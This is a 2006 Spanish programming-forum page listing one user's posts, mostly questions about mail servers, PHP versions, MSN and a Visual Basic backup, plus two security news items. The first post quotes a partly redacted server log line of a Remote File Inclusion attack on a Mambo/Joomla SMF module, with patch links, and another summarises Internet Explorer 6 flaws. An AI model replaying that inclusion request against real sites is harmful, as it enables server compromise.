• Miércoles 1 de Mayo de 2024, 23:42

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - leandrog

Páginas: [1]
1
Vulnerabilidad grave módulo SMF para Mambo - Joomla

Sobre el ataque;

xxxxxx_log

XXX.45.133.X - - [19/Jul/2006:XXXX +0200] “GET /component/option,com_smf/Itemid,63/

components/com_smf/smf.php?mosConfig_absolute_path=

rXXXXXXX.com/components/com_forum/includes/develop? HTTP xxxxxxx “-” “Mozilla/5.0″

Remote File Inclusion

Parche:
http://forum.mamboserver.com/showthread.php?t=83001

Más info:
http://www.frsirt.com/english/advisories/2006/2846

Fuente:
vulneralidad-grave-modulo-smf-para-mambo-joomla

2
Servidores / Tipos De Servidores
« en: Martes 18 de Julio de 2006, 01:08 »
Que tal??, pido disculpas por no haber posteado antes siendo el moderador del foro jeje.

Sin embargo reivindicandome posteo aqui una lista de algunos de los tipos de servidores que existen y su definicion.

Tipos de servidores:

Esta lista categoriza los diversos tipos de servidores del mercado actual:

Plataformas de Servidor (Server Platforms): Un término usado a menudo como sinónimo de sistema operativo, la plataforma es el hardware o software subyacentes para un sistema, es decir, el motor que dirige el servidor.

Servidores de Aplicaciones (Application Servers): Designados a veces como un tipo de middleware (software que conecta dos aplicaciones), los servidores de aplicaciones ocupan una gran parte del territorio entre los servidores de bases de datos y el usuario, y a menudo los conectan.

Servidores de Audio/Video (Audio/Video Servers): Los servidores de Audio/Video añaden capacidades multimedia a los sitios web permitiéndoles mostrar contenido multimedia en forma de flujo continuo (streaming) desde el servidor.

Servidores de Chat (Chat Servers): Los servidores de chat permiten intercambiar información a una gran cantidad de usuarios ofreciendo la posibilidad de llevar a cabo discusiones en tiempo real.

Servidores de Fax (Fax Servers): Un servidor de fax es una solución ideal para organizaciones que tratan de reducir el uso del teléfono pero necesitan enviar documentos por fax.

Servidores FTP (FTP Servers): Uno de los servicios más antiguos de Internet, File Transfer Protocol permite mover uno o más archivos con seguridad entre distintos ordenadores proporcionando seguridad y organización de los archivos así como control de la transferencia.

La seguridad se ha convertido en un tema candente. Durante años, los servidores ftp comunicaban con los clientes "en abierto," es decir, que la información de la conexión y de la contraseña eran vulnerables a la interceptación. Ahora, los servidores ftp, tales como BulletProof FTP, SecureFTP, SurgeFTP, TitanFTP, y WS_FTP, soportan SSL/TLS y utilizan el mismo tipo de cifrado presente en los sitios web seguros. Con SSL/TLS, los servidores ftp pueden cifrar los comandos de control entre los clientes del ftp y el servidor, así como los datos del archivo. Con la ayuda del PGP, como en WS_FTP pro, los datos del archivo se aseguran todavía más con el cifrado público — solamente el usuario que solicitó el archivo puede descifrarlo.

Servidores Groupware (Groupware Servers): Un servidor groupware es un software diseñado para permitir colaborar a los usuarios, sin importar la localización, vía Internet o vía Intranet corporativo y trabajar juntos en una atmósfera virtual.

Servidores IRC (IRC Servers): Otra opción para usuarios que buscan la discusión en tiempo real, Internet Relay Chat consiste en varias redes de servidores separadas que permiten que los usuarios conecten el uno al otro vía una red IRC.

Servidores de Listas (List Servers): Los servidores de listas ofrecen una manera mejor de manejar listas de correo electrónico, bien sean discusiones interactivas abiertas al público o listas unidireccionales de anuncios, boletines de noticias o publicidad.

Servidores de Correo (Mail Servers): Casi tan ubicuos y cruciales como los servidores web, los servidores de correo mueven y almacenan el correo electrónico a través de las redes corporativas (vía LANs y WANs) y a través de Internet.

Servidores de Noticias (News Servers): Los servidores de noticias actúan como fuente de distribución y entrega para los millares de grupos de noticias públicos actualmente accesibles a través de la red de noticias USENET.

Servidores Proxy (Proxy Servers): Los servidores proxy se sitúan entre un programa del cliente (típicamente un navegador) y un servidor externo (típicamente otro servidor web) para filtrar peticiones, mejorar el funcionamiento y compartir conexiones.

Servidores Telnet (Telnet Servers): Un servidor telnet permite a los usuarios entrar en un ordenador huésped y realizar tareas como si estuviera trabajando directamente en ese ordenador.

Servidores Web (Web Servers): Básicamente, un servidor web sirve contenido estático a un navegador, carga un archivo y lo sirve a través de la red al navegador de un usuario. Este intercambio es mediado por el navegador y el servidor que hablan el uno con el otro mediante HTTP. Se pueden utilizar varias tecnologías en el servidor para aumentar su potencia más allá de su capacidad de entregar páginas HTML; éstas incluyen scripts CGI, seguridad SSL, páginas activas del servidor (ASP), pagina de preprocesamiento de hipertexto (PHP), etc.

Agradezco el apoyo que se obtuvo para la aprobacion de este foro.

Saludos.

3
La taberna del BIT / Unos Modds Un Poco Extraños Y Extremos
« en: Sábado 15 de Julio de 2006, 18:49 »
Dios es impresionante la creatividad que puede tener alguien, aunque el que metio en aceite de oliva su FX-55 esta un poco loco, es muy buen metodo pero no se me parece botar a la basura un FX-55 que bien caro que es JAjajajA aqui les dejo el link.

http://www.nopuedocreer.com/quelohayaninventado/?p=264

Saludos.

4
PHP / Php4 Y Php5 Juntos
« en: Jueves 13 de Julio de 2006, 18:22 »
Que tal amigos, me pregunto si se podra tener PHP4 y PHP5 corriendo en la misma maquina simultaneos y sin problemas, y no teniendo que colocar los scripts de php5 como si fueses cgi, tal y como explican en este documento
"PHP4 y PHP5 juntos, pero no revueltos"

Espero sus respuestas, saludos.

5
Sobre los Foros de SoloCodigo / Foro De Servidores Y Aplicaciones Pre-fabricadas
« en: Miércoles 5 de Julio de 2006, 07:24 »
Que tal amigos, propongo la creacion de un Foro que abarque todo lo que tiene que ver con servidores como webservers, servidores de correo, ftp, etc y configuracion de los mismos. Y Aplicaciones Web Pre-Fabricadas (Como Mambo, PHP-Nuke, Sistemas de encuesta y noticias, aplicaciones web de e-commerce).

Ya que me he dado cuenta que ultimamente se pregunta mucho sobre este tipo de cosas y las colocan en foros distintos.

¿Que les parece la idea? :comp:

Saludos.

6
Dudas informáticas / Problema Con Servidor De Correo Entrante
« en: Miércoles 5 de Julio de 2006, 07:17 »
Que tal amigos tengo un problema, tengo hMailServer como servidor de correo entrante y saliente, perfectamente puedo enviar correos, pero no puedo recibir correos  :( , en ninguna de las cuentas asociadas al servidor. Mi pregunta es: ¿Que podra ser, A alguien le ha pasado lo mismo? ¿Que puedo hacer para solucionar este problema?

Agradeceria muchisimo su ayuda

Saludos.

7
La taberna del BIT / Userbars
« en: Lunes 3 de Julio de 2006, 07:42 »
Que tal amigos.

Antes que nada, no se nada de Photoshop ni Diseño ni nada de eso, pero propongo hacer unas Userbars del foro.

Que les parece la idea???

Repito no se nada de diseño asi que quien estaria dispuesto a hacerlas???.

Pienso que daria llamaria mas gente al foro si colocamos esa(s) userbars en otros foros. Y ademas no estaria mal, ya hay muchos otros que las tienen... entonces porque no tenerlas nosotros??? jejejeje  :P

Saludos.

8
Dudas informáticas / Problema Con Cuenta De Msn
« en: Lunes 3 de Julio de 2006, 06:02 »
Que tal amigos, tengo un problema, tengo una cuenta de MSN hotmail pero no puedo conectarme a MSN Messenger en ninguna computadora.  :(

Me sale el mesaje de error que esta en la imagen adjunta, agradeceria cualquier ayuda

Gracias y Saludos.

9
Vulnerabilidades / Descubiertas Dos Nuevas Vulnerabilidades En El Ie
« en: Lunes 3 de Julio de 2006, 02:32 »
Descubiertas dos nuevas vulnerabilidades en el Internet Explorer

El pasado día 27 "Plebo Aesdi Nael" publicaba en la lista de Full-Disclosure un nuevo mendaje con el asunto "IE_ONE_MINOR_ONE_MAJOR" en el que se descubrendos nuevas vulnerabilidades que afectan al Internet Explorer 6.

La primera es un error que puede ser explotado para engañar a una "víctima" para que ejecute un archivo HTA malicioso a través de un ataque de escalada de directorios en el nombre del archivo, para ejecutar el archivo HTA que se encuentre en un sitio remoto a través de SMB o de WebDAV.

La segunda consiste en un error en el tratamiento de las redirecciones mediante el cual es posible acceder a través de un sitio web a documentos servidos por otra web mediante el objeto "object.documentElement.outerHTML".
En secunia an publicado un POC para testear la vulnerabilidad:
http://secunia.com/internet_explorer_infor...erability_test/

Aunque en un primer momento hubo algo de confusión y en SANS se publicaba que el Firefox también se veía afectado por esta vulnerabilidad, parece que definitivamente, no lo está, y aunque si muestra la web falseada, los datos no se comunican entre un dominio y otro.

El Internet Explorer 7 (en fase beta) no está afectado por estas vulnerabilidades, sin embargo, se acaba de publicar en Bugtraq un nuevo crash que si afecta a esta versión del IE: http://www.securityfocus.com/archive/1/438754

Microsoft mientras tanto se ha pronunciado en el blog de technet para decir... nada.
http://blogs.technet.com/msrc/archive/2006/06/28/439272.aspx

 
Ref: http://cyruxnet.org/archivo.php?20060630.00

10
Publicaciones y e-books / Mygnet
« en: Miércoles 28 de Junio de 2006, 01:03 »
Que tal amigos, busque en el foro y no encontre esta pagina en ninguna parte exepto por un post que hice anteriormente  :D .

Les recomiendo esta pagina, esta muy buena, tiene una seccion de manuales de muchos Lenguajes de Programacion y una seccion de codigos muy buena tambien.

Mygnet

Saludos.

11
La taberna del BIT / Punto De Vista Cientifico De La Vida Y La Muerte
« en: Lunes 26 de Junio de 2006, 20:12 »
Buenas tardes amigos, quisera pedirles opinion de ¿Como Uds Creen que los Cientificos Ven la Vida y La Muerte?

Lo necesito para un trabajo de la Universidad  <_< , ya que me mandaron a hacer una encuesta y es lo unico que me falta  :P

Muchas gracias por su ayuda, me sera muy util.

Saludos.

Espero sus opiniones.

12
Visual Basic .NET / Link De Descarga De Vb 2005 Express
« en: Domingo 18 de Junio de 2006, 03:42 »
Que tal??. Utilizando el buscador, encontre que nadie ha posteado que se puede descargar Visual Basic 2005 Express Edition, de forma gratis de la misma pagina de Microsoft Developer Network (MSDN)

Para los que los sabian, bien, para los que no y lo desean, aqui esta el link:

Visual Basic 2005 Express Edition

Saludos. :comp:

13
Visual Basic 6.0 e inferiores / Backup
« en: Viernes 24 de Marzo de 2006, 04:11 »
Que tal amigos, es mi primer mjs en el foro.
tengo un problema necesito poder hacer el backup de una BD en Dbase (osea el archivo  .dbf y el .dbt) solo copiandolos a otra carpeta, lo intente con la funcion filecopy pero no lo consigo, estoy mas que seguro que este codigo esta super errado. gracias y disculpen  :P

Código: Text
  1. Dim source1, source2 As String
  2. Dim dest1, dest2 As String
  3.  
  4. source1 = Dir("\" & "data.dbf")
  5. source2 = Dir("\" & "data.dbt")
  6. dest1 = Dir("C:\Documents and Settings\lg\Escritorio\")
  7. dest2 = Dir("C:\Documents and Settings\lg\Escritorio\")
  8.  
  9. FileCopy source1, dest1
  10. FileCopy source2, dest2
  11.  

Páginas: [1]